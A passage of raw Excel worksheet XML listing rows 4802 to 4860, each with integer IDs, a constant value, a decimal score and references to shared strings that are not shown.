        <v>6522</v>
      </c>
      <c r="D4802">
        <v>2</v>
      </c>
      <c r="E4802">
        <v>0.94290000200271606</v>
      </c>
      <c r="F4802" t="s">
        <v>5592</v>
      </c>
      <c r="G4802" t="s">
        <v>9495</v>
      </c>
      <c r="H4802" t="s">
        <v>9496</v>
      </c>
    </row>
    <row r="4803" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4803" s="1">
        <v>4801</v>
      </c>
      <c r="B4803">
        <v>6521</v>
      </c>
      <c r="C4803">
        <v>6521</v>
      </c>
      <c r="D4803">
        <v>2</v>
      </c>
      <c r="E4803">
        <v>0.91380000114440918</v>
      </c>
      <c r="F4803" t="s">
        <v>5592</v>
      </c>
      <c r="G4803" t="s">
        <v>9497</v>
      </c>
      <c r="H4803" t="s">
        <v>9498</v>
      </c>
    </row>
    <row r="4804" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4804" s="1">
        <v>4802</v>
      </c>
      <c r="B4804">
        <v>6520</v>
      </c>
      <c r="C4804">
        <v>6520</v>
      </c>
      <c r="D4804">
        <v>2</v>
      </c>
      <c r="E4804">
        <v>0.85420000553131104</v>
      </c>
      <c r="F4804" t="s">
        <v>5592</v>
      </c>
      <c r="G4804" t="s">
        <v>9499</v>
      </c>
      <c r="H4804" t="s">
        <v>9500</v>
      </c>
    </row>
    <row r="4805" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4805" s="1">
        <v>4803</v>
      </c>
      <c r="B4805">
        <v>3196</v>
      </c>
      <c r="C4805">
        <v>3196</v>
      </c>
      <c r="D4805">
        <v>2</v>
      </c>
      <c r="E4805">
        <v>0.82279998064041138</v>
      </c>
      <c r="F4805" t="s">
        <v>5592</v>
      </c>
      <c r="G4805" t="s">
        <v>9501</v>
      </c>
      <c r="H4805" t="s">
        <v>9502</v>
      </c>
    </row>
    <row r="4806" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4806" s="1">
        <v>4804</v>
      </c>
      <c r="B4806">
        <v>6519</v>
      </c>
      <c r="C4806">
        <v>6519</v>
      </c>
      <c r="D4806">
        <v>2</v>
      </c>
      <c r="E4806">
        <v>0.99629998207092285</v>
      </c>
      <c r="F4806" t="s">
        <v>5592</v>
      </c>
      <c r="G4806" t="s">
        <v>9503</v>
      </c>
      <c r="H4806" t="s">
        <v>9504</v>
      </c>
    </row>
    <row r="4807" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4807" s="1">
        <v>4805</v>
      </c>
      <c r="B4807">
        <v>6518</v>
      </c>
      <c r="C4807">
        <v>6518</v>
      </c>
      <c r="D4807">
        <v>2</v>
      </c>
      <c r="E4807">
        <v>0.73570001125335693</v>
      </c>
      <c r="F4807" t="s">
        <v>5592</v>
      </c>
      <c r="G4807" t="s">
        <v>9505</v>
      </c>
      <c r="H4807" t="s">
        <v>9506</v>
      </c>
    </row>
    <row r="4808" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4808" s="1">
        <v>4806</v>
      </c>
      <c r="B4808">
        <v>6516</v>
      </c>
      <c r="C4808">
        <v>6516</v>
      </c>
      <c r="D4808">
        <v>2</v>
      </c>
      <c r="E4808">
        <v>0.99949997663497925</v>
      </c>
      <c r="F4808" t="s">
        <v>5592</v>
      </c>
      <c r="G4808" t="s">
        <v>9507</v>
      </c>
      <c r="H4808" t="s">
        <v>6875</v>
      </c>
    </row>
    <row r="4809" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4809" s="1">
        <v>4807</v>
      </c>
      <c r="B4809">
        <v>6515</v>
      </c>
      <c r="C4809">
        <v>6515</v>
      </c>
      <c r="D4809">
        <v>2</v>
      </c>
      <c r="E4809">
        <v>0.9869999885559082</v>
      </c>
      <c r="F4809" t="s">
        <v>5592</v>
      </c>
      <c r="G4809" t="s">
        <v>9508</v>
      </c>
      <c r="H4809" t="s">
        <v>9509</v>
      </c>
    </row>
    <row r="4810" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4810" s="1">
        <v>4808</v>
      </c>
      <c r="B4810">
        <v>3201</v>
      </c>
      <c r="C4810">
        <v>3201</v>
      </c>
      <c r="D4810">
        <v>2</v>
      </c>
      <c r="E4810">
        <v>0.9944000244140625</v>
      </c>
      <c r="F4810" t="s">
        <v>5592</v>
      </c>
      <c r="G4810" t="s">
        <v>9510</v>
      </c>
      <c r="H4810" t="s">
        <v>9511</v>
      </c>
    </row>
    <row r="4811" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4811" s="1">
        <v>4809</v>
      </c>
      <c r="B4811">
        <v>6538</v>
      </c>
      <c r="C4811">
        <v>6538</v>
      </c>
      <c r="D4811">
        <v>2</v>
      </c>
      <c r="E4811">
        <v>0.99819999933242798</v>
      </c>
      <c r="F4811" t="s">
        <v>5592</v>
      </c>
      <c r="G4811" t="s">
        <v>9512</v>
      </c>
      <c r="H4811" t="s">
        <v>9513</v>
      </c>
    </row>
    <row r="4812" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4812" s="1">
        <v>4810</v>
      </c>
      <c r="B4812">
        <v>3204</v>
      </c>
      <c r="C4812">
        <v>3204</v>
      </c>
      <c r="D4812">
        <v>2</v>
      </c>
      <c r="E4812">
        <v>0.90759998559951782</v>
      </c>
      <c r="F4812" t="s">
        <v>5592</v>
      </c>
      <c r="G4812" t="s">
        <v>9514</v>
      </c>
      <c r="H4812" t="s">
        <v>9515</v>
      </c>
    </row>
    <row r="4813" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4813" s="1">
        <v>4811</v>
      </c>
      <c r="B4813">
        <v>3160</v>
      </c>
      <c r="C4813">
        <v>3160</v>
      </c>
      <c r="D4813">
        <v>2</v>
      </c>
      <c r="E4813">
        <v>0.99900001287460327</v>
      </c>
      <c r="F4813" t="s">
        <v>5592</v>
      </c>
      <c r="G4813" t="s">
        <v>9516</v>
      </c>
      <c r="H4813" t="s">
        <v>7794</v>
      </c>
    </row>
    <row r="4814" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4814" s="1">
        <v>4812</v>
      </c>
      <c r="B4814">
        <v>3158</v>
      </c>
      <c r="C4814">
        <v>3158</v>
      </c>
      <c r="D4814">
        <v>2</v>
      </c>
      <c r="E4814">
        <v>0.92470002174377441</v>
      </c>
      <c r="F4814" t="s">
        <v>5592</v>
      </c>
      <c r="G4814" t="s">
        <v>9517</v>
      </c>
      <c r="H4814" t="s">
        <v>9518</v>
      </c>
    </row>
    <row r="4815" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4815" s="1">
        <v>4813</v>
      </c>
      <c r="B4815">
        <v>6544</v>
      </c>
      <c r="C4815">
        <v>6544</v>
      </c>
      <c r="D4815">
        <v>2</v>
      </c>
      <c r="E4815">
        <v>0.9779999852180481</v>
      </c>
      <c r="F4815" t="s">
        <v>5592</v>
      </c>
      <c r="G4815" t="s">
        <v>9519</v>
      </c>
      <c r="H4815" t="s">
        <v>9520</v>
      </c>
    </row>
    <row r="4816" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4816" s="1">
        <v>4814</v>
      </c>
      <c r="B4816">
        <v>3131</v>
      </c>
      <c r="C4816">
        <v>3131</v>
      </c>
      <c r="D4816">
        <v>2</v>
      </c>
      <c r="E4816">
        <v>0.74029999971389771</v>
      </c>
      <c r="F4816" t="s">
        <v>5592</v>
      </c>
      <c r="G4816" t="s">
        <v>9521</v>
      </c>
      <c r="H4816" t="s">
        <v>9522</v>
      </c>
    </row>
    <row r="4817" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4817" s="1">
        <v>4815</v>
      </c>
      <c r="B4817">
        <v>3132</v>
      </c>
      <c r="C4817">
        <v>3132</v>
      </c>
      <c r="D4817">
        <v>2</v>
      </c>
      <c r="E4817">
        <v>0.5493999719619751</v>
      </c>
      <c r="F4817" t="s">
        <v>5592</v>
      </c>
      <c r="G4817" t="s">
        <v>9523</v>
      </c>
      <c r="H4817" t="s">
        <v>9524</v>
      </c>
    </row>
    <row r="4818" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4818" s="1">
        <v>4816</v>
      </c>
      <c r="B4818">
        <v>3133</v>
      </c>
      <c r="C4818">
        <v>3133</v>
      </c>
      <c r="D4818">
        <v>2</v>
      </c>
      <c r="E4818">
        <v>0.99390000104904175</v>
      </c>
      <c r="F4818" t="s">
        <v>5592</v>
      </c>
      <c r="G4818" t="s">
        <v>9525</v>
      </c>
      <c r="H4818" t="s">
        <v>9526</v>
      </c>
    </row>
    <row r="4819" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4819" s="1">
        <v>4817</v>
      </c>
      <c r="B4819">
        <v>3135</v>
      </c>
      <c r="C4819">
        <v>3135</v>
      </c>
      <c r="D4819">
        <v>2</v>
      </c>
      <c r="E4819">
        <v>0.99879997968673706</v>
      </c>
      <c r="F4819" t="s">
        <v>5592</v>
      </c>
      <c r="G4819" t="s">
        <v>9527</v>
      </c>
      <c r="H4819" t="s">
        <v>9528</v>
      </c>
    </row>
    <row r="4820" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4820" s="1">
        <v>4818</v>
      </c>
      <c r="B4820">
        <v>6543</v>
      </c>
      <c r="C4820">
        <v>6543</v>
      </c>
      <c r="D4820">
        <v>2</v>
      </c>
      <c r="E4820">
        <v>0.63690000772476196</v>
      </c>
      <c r="F4820" t="s">
        <v>5592</v>
      </c>
      <c r="G4820" t="s">
        <v>9529</v>
      </c>
      <c r="H4820" t="s">
        <v>9530</v>
      </c>
    </row>
    <row r="4821" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4821" s="1">
        <v>4819</v>
      </c>
      <c r="B4821">
        <v>6542</v>
      </c>
      <c r="C4821">
        <v>6542</v>
      </c>
      <c r="D4821">
        <v>2</v>
      </c>
      <c r="E4821">
        <v>0.56410002708435059</v>
      </c>
      <c r="F4821" t="s">
        <v>5592</v>
      </c>
      <c r="G4821" t="s">
        <v>9531</v>
      </c>
      <c r="H4821" t="s">
        <v>9532</v>
      </c>
    </row>
    <row r="4822" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4822" s="1">
        <v>4820</v>
      </c>
      <c r="B4822">
        <v>3141</v>
      </c>
      <c r="C4822">
        <v>3141</v>
      </c>
      <c r="D4822">
        <v>2</v>
      </c>
      <c r="E4822">
        <v>0.99819999933242798</v>
      </c>
      <c r="F4822" t="s">
        <v>5592</v>
      </c>
      <c r="G4822" t="s">
        <v>9533</v>
      </c>
      <c r="H4822" t="s">
        <v>9534</v>
      </c>
    </row>
    <row r="4823" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4823" s="1">
        <v>4821</v>
      </c>
      <c r="B4823">
        <v>6541</v>
      </c>
      <c r="C4823">
        <v>6541</v>
      </c>
      <c r="D4823">
        <v>2</v>
      </c>
      <c r="E4823">
        <v>0.82999998331069946</v>
      </c>
      <c r="F4823" t="s">
        <v>5592</v>
      </c>
      <c r="G4823" t="s">
        <v>9535</v>
      </c>
      <c r="H4823" t="s">
        <v>9536</v>
      </c>
    </row>
    <row r="4824" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4824" s="1">
        <v>4822</v>
      </c>
      <c r="B4824">
        <v>3143</v>
      </c>
      <c r="C4824">
        <v>3143</v>
      </c>
      <c r="D4824">
        <v>2</v>
      </c>
      <c r="E4824">
        <v>0.52020001411437988</v>
      </c>
      <c r="F4824" t="s">
        <v>5592</v>
      </c>
      <c r="G4824" t="s">
        <v>9537</v>
      </c>
      <c r="H4824" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="4825" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4825" s="1">
        <v>4823</v>
      </c>
      <c r="B4825">
        <v>6539</v>
      </c>
      <c r="C4825">
        <v>6539</v>
      </c>
      <c r="D4825">
        <v>2</v>
      </c>
      <c r="E4825">
        <v>0.66490000486373901</v>
      </c>
      <c r="F4825" t="s">
        <v>5592</v>
      </c>
      <c r="G4825" t="s">
        <v>9539</v>
      </c>
      <c r="H4825" t="s">
        <v>9540</v>
      </c>
    </row>
    <row r="4826" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4826" s="1">
        <v>4824</v>
      </c>
      <c r="B4826">
        <v>3148</v>
      </c>
      <c r="C4826">
        <v>3148</v>
      </c>
      <c r="D4826">
        <v>2</v>
      </c>
      <c r="E4826">
        <v>0.99599999189376831</v>
      </c>
      <c r="F4826" t="s">
        <v>5592</v>
      </c>
      <c r="G4826" t="s">
        <v>9541</v>
      </c>
      <c r="H4826" t="s">
        <v>9542</v>
      </c>
    </row>
    <row r="4827" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4827" s="1">
        <v>4825</v>
      </c>
      <c r="B4827">
        <v>3149</v>
      </c>
      <c r="C4827">
        <v>3149</v>
      </c>
      <c r="D4827">
        <v>2</v>
      </c>
      <c r="E4827">
        <v>0.80699998140335083</v>
      </c>
      <c r="F4827" t="s">
        <v>5592</v>
      </c>
      <c r="G4827" t="s">
        <v>9543</v>
      </c>
      <c r="H4827" t="s">
        <v>9544</v>
      </c>
    </row>
    <row r="4828" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4828" s="1">
        <v>4826</v>
      </c>
      <c r="B4828">
        <v>3150</v>
      </c>
      <c r="C4828">
        <v>3150</v>
      </c>
      <c r="D4828">
        <v>2</v>
      </c>
      <c r="E4828">
        <v>0.99229997396469116</v>
      </c>
      <c r="F4828" t="s">
        <v>5592</v>
      </c>
      <c r="G4828" t="s">
        <v>9545</v>
      </c>
      <c r="H4828" t="s">
        <v>9546</v>
      </c>
    </row>
    <row r="4829" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4829" s="1">
        <v>4827</v>
      </c>
      <c r="B4829">
        <v>3151</v>
      </c>
      <c r="C4829">
        <v>3151</v>
      </c>
      <c r="D4829">
        <v>2</v>
      </c>
      <c r="E4829">
        <v>0.99779999256134033</v>
      </c>
      <c r="F4829" t="s">
        <v>5592</v>
      </c>
      <c r="G4829" t="s">
        <v>9547</v>
      </c>
      <c r="H4829" t="s">
        <v>9548</v>
      </c>
    </row>
    <row r="4830" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4830" s="1">
        <v>4828</v>
      </c>
      <c r="B4830">
        <v>3152</v>
      </c>
      <c r="C4830">
        <v>3152</v>
      </c>
      <c r="D4830">
        <v>2</v>
      </c>
      <c r="E4830">
        <v>0.75959998369216919</v>
      </c>
      <c r="F4830" t="s">
        <v>5592</v>
      </c>
      <c r="G4830" t="s">
        <v>9549</v>
      </c>
      <c r="H4830" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="4831" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4831" s="1">
        <v>4829</v>
      </c>
      <c r="B4831">
        <v>3153</v>
      </c>
      <c r="C4831">
        <v>3153</v>
      </c>
      <c r="D4831">
        <v>2</v>
      </c>
      <c r="E4831">
        <v>0.99550002813339233</v>
      </c>
      <c r="F4831" t="s">
        <v>5592</v>
      </c>
      <c r="G4831" t="s">
        <v>9551</v>
      </c>
      <c r="H4831" t="s">
        <v>9552</v>
      </c>
    </row>
    <row r="4832" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4832" s="1">
        <v>4830</v>
      </c>
      <c r="B4832">
        <v>3154</v>
      </c>
      <c r="C4832">
        <v>3154</v>
      </c>
      <c r="D4832">
        <v>2</v>
      </c>
      <c r="E4832">
        <v>0.99870002269744873</v>
      </c>
      <c r="F4832" t="s">
        <v>5592</v>
      </c>
      <c r="G4832" t="s">
        <v>9553</v>
      </c>
      <c r="H4832" t="s">
        <v>9554</v>
      </c>
    </row>
    <row r="4833" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4833" s="1">
        <v>4831</v>
      </c>
      <c r="B4833">
        <v>3155</v>
      </c>
      <c r="C4833">
        <v>3155</v>
      </c>
      <c r="D4833">
        <v>2</v>
      </c>
      <c r="E4833">
        <v>0.99870002269744873</v>
      </c>
      <c r="F4833" t="s">
        <v>5592</v>
      </c>
      <c r="G4833" t="s">
        <v>9555</v>
      </c>
      <c r="H4833" t="s">
        <v>9554</v>
      </c>
    </row>
    <row r="4834" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4834" s="1">
        <v>4832</v>
      </c>
      <c r="B4834">
        <v>3156</v>
      </c>
      <c r="C4834">
        <v>3156</v>
      </c>
      <c r="D4834">
        <v>2</v>
      </c>
      <c r="E4834">
        <v>0.99180001020431519</v>
      </c>
      <c r="F4834" t="s">
        <v>5592</v>
      </c>
      <c r="G4834" t="s">
        <v>9556</v>
      </c>
      <c r="H4834" t="s">
        <v>9557</v>
      </c>
    </row>
    <row r="4835" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4835" s="1">
        <v>4833</v>
      </c>
      <c r="B4835">
        <v>3157</v>
      </c>
      <c r="C4835">
        <v>3157</v>
      </c>
      <c r="D4835">
        <v>2</v>
      </c>
      <c r="E4835">
        <v>0.82620000839233398</v>
      </c>
      <c r="F4835" t="s">
        <v>5592</v>
      </c>
      <c r="G4835" t="s">
        <v>9558</v>
      </c>
      <c r="H4835" t="s">
        <v>9559</v>
      </c>
    </row>
    <row r="4836" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4836" s="1">
        <v>4834</v>
      </c>
      <c r="B4836">
        <v>3159</v>
      </c>
      <c r="C4836">
        <v>3159</v>
      </c>
      <c r="D4836">
        <v>2</v>
      </c>
      <c r="E4836">
        <v>0.99779999256134033</v>
      </c>
      <c r="F4836" t="s">
        <v>5592</v>
      </c>
      <c r="G4836" t="s">
        <v>9560</v>
      </c>
      <c r="H4836" t="s">
        <v>9561</v>
      </c>
    </row>
    <row r="4837" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4837" s="1">
        <v>4835</v>
      </c>
      <c r="B4837">
        <v>3210</v>
      </c>
      <c r="C4837">
        <v>3210</v>
      </c>
      <c r="D4837">
        <v>2</v>
      </c>
      <c r="E4837">
        <v>0.58079999685287476</v>
      </c>
      <c r="F4837" t="s">
        <v>5592</v>
      </c>
      <c r="G4837" t="s">
        <v>9562</v>
      </c>
      <c r="H4837" t="s">
        <v>9563</v>
      </c>
    </row>
    <row r="4838" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4838" s="1">
        <v>4836</v>
      </c>
      <c r="B4838">
        <v>3216</v>
      </c>
      <c r="C4838">
        <v>3216</v>
      </c>
      <c r="D4838">
        <v>2</v>
      </c>
      <c r="E4838">
        <v>0.79320001602172852</v>
      </c>
      <c r="F4838" t="s">
        <v>5592</v>
      </c>
      <c r="G4838" t="s">
        <v>9564</v>
      </c>
      <c r="H4838" t="s">
        <v>9565</v>
      </c>
    </row>
    <row r="4839" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4839" s="1">
        <v>4837</v>
      </c>
      <c r="B4839">
        <v>3217</v>
      </c>
      <c r="C4839">
        <v>3217</v>
      </c>
      <c r="D4839">
        <v>2</v>
      </c>
      <c r="E4839">
        <v>0.88679999113082886</v>
      </c>
      <c r="F4839" t="s">
        <v>5592</v>
      </c>
      <c r="G4839" t="s">
        <v>9566</v>
      </c>
      <c r="H4839" t="s">
        <v>9567</v>
      </c>
    </row>
    <row r="4840" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4840" s="1">
        <v>4838</v>
      </c>
      <c r="B4840">
        <v>3291</v>
      </c>
      <c r="C4840">
        <v>3291</v>
      </c>
      <c r="D4840">
        <v>2</v>
      </c>
      <c r="E4840">
        <v>0.96390002965927124</v>
      </c>
      <c r="F4840" t="s">
        <v>5592</v>
      </c>
      <c r="G4840" t="s">
        <v>9568</v>
      </c>
      <c r="H4840" t="s">
        <v>9569</v>
      </c>
    </row>
    <row r="4841" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4841" s="1">
        <v>4839</v>
      </c>
      <c r="B4841">
        <v>3292</v>
      </c>
      <c r="C4841">
        <v>3292</v>
      </c>
      <c r="D4841">
        <v>2</v>
      </c>
      <c r="E4841">
        <v>0.93449997901916504</v>
      </c>
      <c r="F4841" t="s">
        <v>5592</v>
      </c>
      <c r="G4841" t="s">
        <v>9570</v>
      </c>
      <c r="H4841" t="s">
        <v>9571</v>
      </c>
    </row>
    <row r="4842" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4842" s="1">
        <v>4840</v>
      </c>
      <c r="B4842">
        <v>3294</v>
      </c>
      <c r="C4842">
        <v>3294</v>
      </c>
      <c r="D4842">
        <v>2</v>
      </c>
      <c r="E4842">
        <v>0.95649999380111694</v>
      </c>
      <c r="F4842" t="s">
        <v>5592</v>
      </c>
      <c r="G4842" t="s">
        <v>9572</v>
      </c>
      <c r="H4842" t="s">
        <v>9573</v>
      </c>
    </row>
    <row r="4843" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4843" s="1">
        <v>4841</v>
      </c>
      <c r="B4843">
        <v>3295</v>
      </c>
      <c r="C4843">
        <v>3295</v>
      </c>
      <c r="D4843">
        <v>2</v>
      </c>
      <c r="E4843">
        <v>0.99930000305175781</v>
      </c>
      <c r="F4843" t="s">
        <v>5592</v>
      </c>
      <c r="G4843" t="s">
        <v>9574</v>
      </c>
      <c r="H4843" t="s">
        <v>9575</v>
      </c>
    </row>
    <row r="4844" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4844" s="1">
        <v>4842</v>
      </c>
      <c r="B4844">
        <v>6480</v>
      </c>
      <c r="C4844">
        <v>6480</v>
      </c>
      <c r="D4844">
        <v>2</v>
      </c>
      <c r="E4844">
        <v>0.99790000915527344</v>
      </c>
      <c r="F4844" t="s">
        <v>5592</v>
      </c>
      <c r="G4844" t="s">
        <v>9576</v>
      </c>
      <c r="H4844" t="s">
        <v>9577</v>
      </c>
    </row>
    <row r="4845" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4845" s="1">
        <v>4843</v>
      </c>
      <c r="B4845">
        <v>6478</v>
      </c>
      <c r="C4845">
        <v>6478</v>
      </c>
      <c r="D4845">
        <v>2</v>
      </c>
      <c r="E4845">
        <v>0.67390000820159912</v>
      </c>
      <c r="F4845" t="s">
        <v>5592</v>
      </c>
      <c r="G4845" t="s">
        <v>9578</v>
      </c>
      <c r="H4845" t="s">
        <v>9579</v>
      </c>
    </row>
    <row r="4846" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4846" s="1">
        <v>4844</v>
      </c>
      <c r="B4846">
        <v>6477</v>
      </c>
      <c r="C4846">
        <v>6477</v>
      </c>
      <c r="D4846">
        <v>2</v>
      </c>
      <c r="E4846">
        <v>0.5526999831199646</v>
      </c>
      <c r="F4846" t="s">
        <v>5592</v>
      </c>
      <c r="G4846" t="s">
        <v>9580</v>
      </c>
      <c r="H4846" t="s">
        <v>9581</v>
      </c>
    </row>
    <row r="4847" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4847" s="1">
        <v>4845</v>
      </c>
      <c r="B4847">
        <v>6476</v>
      </c>
      <c r="C4847">
        <v>6476</v>
      </c>
      <c r="D4847">
        <v>2</v>
      </c>
      <c r="E4847">
        <v>0.53329998254776001</v>
      </c>
      <c r="F4847" t="s">
        <v>5592</v>
      </c>
      <c r="G4847" t="s">
        <v>9582</v>
      </c>
      <c r="H4847" t="s">
        <v>9583</v>
      </c>
    </row>
    <row r="4848" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4848" s="1">
        <v>4846</v>
      </c>
      <c r="B4848">
        <v>3300</v>
      </c>
      <c r="C4848">
        <v>3300</v>
      </c>
      <c r="D4848">
        <v>2</v>
      </c>
      <c r="E4848">
        <v>0.98869997262954712</v>
      </c>
      <c r="F4848" t="s">
        <v>5592</v>
      </c>
      <c r="G4848" t="s">
        <v>9584</v>
      </c>
      <c r="H4848" t="s">
        <v>9585</v>
      </c>
    </row>
    <row r="4849" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4849" s="1">
        <v>4847</v>
      </c>
      <c r="B4849">
        <v>3301</v>
      </c>
      <c r="C4849">
        <v>3301</v>
      </c>
      <c r="D4849">
        <v>2</v>
      </c>
      <c r="E4849">
        <v>0.98580002784729004</v>
      </c>
      <c r="F4849" t="s">
        <v>5592</v>
      </c>
      <c r="G4849" t="s">
        <v>9586</v>
      </c>
      <c r="H4849" t="s">
        <v>9587</v>
      </c>
    </row>
    <row r="4850" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4850" s="1">
        <v>4848</v>
      </c>
      <c r="B4850">
        <v>3303</v>
      </c>
      <c r="C4850">
        <v>3303</v>
      </c>
      <c r="D4850">
        <v>2</v>
      </c>
      <c r="E4850">
        <v>0.99080002307891846</v>
      </c>
      <c r="F4850" t="s">
        <v>5592</v>
      </c>
      <c r="G4850" t="s">
        <v>9588</v>
      </c>
      <c r="H4850" t="s">
        <v>9589</v>
      </c>
    </row>
    <row r="4851" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4851" s="1">
        <v>4849</v>
      </c>
      <c r="B4851">
        <v>3304</v>
      </c>
      <c r="C4851">
        <v>3304</v>
      </c>
      <c r="D4851">
        <v>2</v>
      </c>
      <c r="E4851">
        <v>0.99330002069473267</v>
      </c>
      <c r="F4851" t="s">
        <v>5592</v>
      </c>
      <c r="G4851" t="s">
        <v>9590</v>
      </c>
      <c r="H4851" t="s">
        <v>9591</v>
      </c>
    </row>
    <row r="4852" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4852" s="1">
        <v>4850</v>
      </c>
      <c r="B4852">
        <v>3305</v>
      </c>
      <c r="C4852">
        <v>3305</v>
      </c>
      <c r="D4852">
        <v>2</v>
      </c>
      <c r="E4852">
        <v>0.99650001525878906</v>
      </c>
      <c r="F4852" t="s">
        <v>5592</v>
      </c>
      <c r="G4852" t="s">
        <v>9592</v>
      </c>
      <c r="H4852" t="s">
        <v>9593</v>
      </c>
    </row>
    <row r="4853" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4853" s="1">
        <v>4851</v>
      </c>
      <c r="B4853">
        <v>3306</v>
      </c>
      <c r="C4853">
        <v>3306</v>
      </c>
      <c r="D4853">
        <v>2</v>
      </c>
      <c r="E4853">
        <v>0.9966999888420105</v>
      </c>
      <c r="F4853" t="s">
        <v>5592</v>
      </c>
      <c r="G4853" t="s">
        <v>9594</v>
      </c>
      <c r="H4853" t="s">
        <v>9595</v>
      </c>
    </row>
    <row r="4854" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4854" s="1">
        <v>4852</v>
      </c>
      <c r="B4854">
        <v>3307</v>
      </c>
      <c r="C4854">
        <v>3307</v>
      </c>
      <c r="D4854">
        <v>2</v>
      </c>
      <c r="E4854">
        <v>0.98229998350143433</v>
      </c>
      <c r="F4854" t="s">
        <v>5592</v>
      </c>
      <c r="G4854" t="s">
        <v>9596</v>
      </c>
      <c r="H4854" t="s">
        <v>9597</v>
      </c>
    </row>
    <row r="4855" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4855" s="1">
        <v>4853</v>
      </c>
      <c r="B4855">
        <v>3308</v>
      </c>
      <c r="C4855">
        <v>3308</v>
      </c>
      <c r="D4855">
        <v>2</v>
      </c>
      <c r="E4855">
        <v>0.99699997901916504</v>
      </c>
      <c r="F4855" t="s">
        <v>5592</v>
      </c>
      <c r="G4855" t="s">
        <v>9598</v>
      </c>
      <c r="H4855" t="s">
        <v>9599</v>
      </c>
    </row>
    <row r="4856" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4856" s="1">
        <v>4854</v>
      </c>
      <c r="B4856">
        <v>3309</v>
      </c>
      <c r="C4856">
        <v>3309</v>
      </c>
      <c r="D4856">
        <v>2</v>
      </c>
      <c r="E4856">
        <v>0.79240000247955322</v>
      </c>
      <c r="F4856" t="s">
        <v>5592</v>
      </c>
      <c r="G4856" t="s">
        <v>9600</v>
      </c>
      <c r="H4856" t="s">
        <v>9601</v>
      </c>
    </row>
    <row r="4857" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4857" s="1">
        <v>4855</v>
      </c>
      <c r="B4857">
        <v>3310</v>
      </c>
      <c r="C4857">
        <v>3310</v>
      </c>
      <c r="D4857">
        <v>2</v>
      </c>
      <c r="E4857">
        <v>0.90299999713897705</v>
      </c>
      <c r="F4857" t="s">
        <v>5592</v>
      </c>
      <c r="G4857" t="s">
        <v>9602</v>
      </c>
      <c r="H4857" t="s">
        <v>9603</v>
      </c>
    </row>
    <row r="4858" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4858" s="1">
        <v>4856</v>
      </c>
      <c r="B4858">
        <v>3313</v>
      </c>
      <c r="C4858">
        <v>3313</v>
      </c>
      <c r="D4858">
        <v>2</v>
      </c>
      <c r="E4858">
        <v>0.80369997024536133</v>
      </c>
      <c r="F4858" t="s">
        <v>5592</v>
      </c>
      <c r="G4858" t="s">
        <v>9604</v>
      </c>
      <c r="H4858" t="s">
        <v>9605</v>
      </c>
    </row>
    <row r="4859" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4859" s="1">
        <v>4857</v>
      </c>
      <c r="B4859">
        <v>3314</v>
      </c>
      <c r="C4859">
        <v>3314</v>
      </c>
      <c r="D4859">
        <v>2</v>
      </c>
      <c r="E4859">
        <v>0.99889999628067017</v>
      </c>
      <c r="F4859" t="s">
        <v>5592</v>
      </c>
      <c r="G4859" t="s">
        <v>9606</v>
      </c>
      <c r="H4859" t="s">
        <v>9607</v>
      </c>
    </row>
    <row r="4860" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4860" s="1">
        <v>4858</v>
      </c>
      <c r="B4860">
        <v>3315</v>
      </c>
      <c r="C4860">
        <v>3315</v>
      </c>
      <c r="D4860">
        <v>2</v>
      </c>
      <c r="E4860">
        <v>0.64759999513626099</v>
      </c>
      <c r="F4860" t="s">
        <v>5592</v>
